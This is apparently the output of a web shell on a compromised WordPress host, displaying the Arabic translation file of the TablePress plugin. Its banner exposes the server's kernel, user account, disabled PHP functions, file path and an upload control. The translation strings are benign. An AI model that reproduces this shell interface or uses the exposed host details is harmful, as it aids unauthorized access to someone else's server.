WS_OK_7.4.33 HEX
HEX
Server: nginx/1.21.4
System: Linux v12674 6.8.0-85-generic #85-Ubuntu SMP PREEMPT_DYNAMIC Thu Sep 18 15:26:59 UTC 2025 x86_64
User: endtheignorance (1014)
PHP: 7.4.33
Disabled: exec,passthru,shell_exec,system,proc_open,popen,parse_ini_file,show_source
Upload Files
File: /storage/v12674/lcautah/public_html/wp-content/plugins/tablepress/i18n/datatables/lang-ar.php
<?php
/**
 * TablePress DataTables language file for "ar".
 *
 * @package TablePress
 * @subpackage DataTables
 * @author Tobias Bäthge
 * @since 2.0.0
 */

return array(
	'info'         => 'إظهار _START_ إلى _END_ من أصل _TOTAL_ مُدخل',
	'infoEmpty'    => 'يعرض 0 إلى 0 من أصل 0 سجلّ',
	'infoFiltered' => '(منتقاة من مجموع _MAX_ مُدخل)',
	'infoPostFix'  => '',
	'lengthMenu'   => 'أظهر مُدخلات _MENU_',
	'processing'   => 'جاري التحميل...',
	'search'       => 'ابحث:',
	'zeroRecords'  => 'لم يُعثر على أية سجلات',
	'paginate'     => array(
		'first'    => '❮❮',
		'previous' => '❮',
		'next'     => '❯',
		'last'     => '❯❯',
	),
);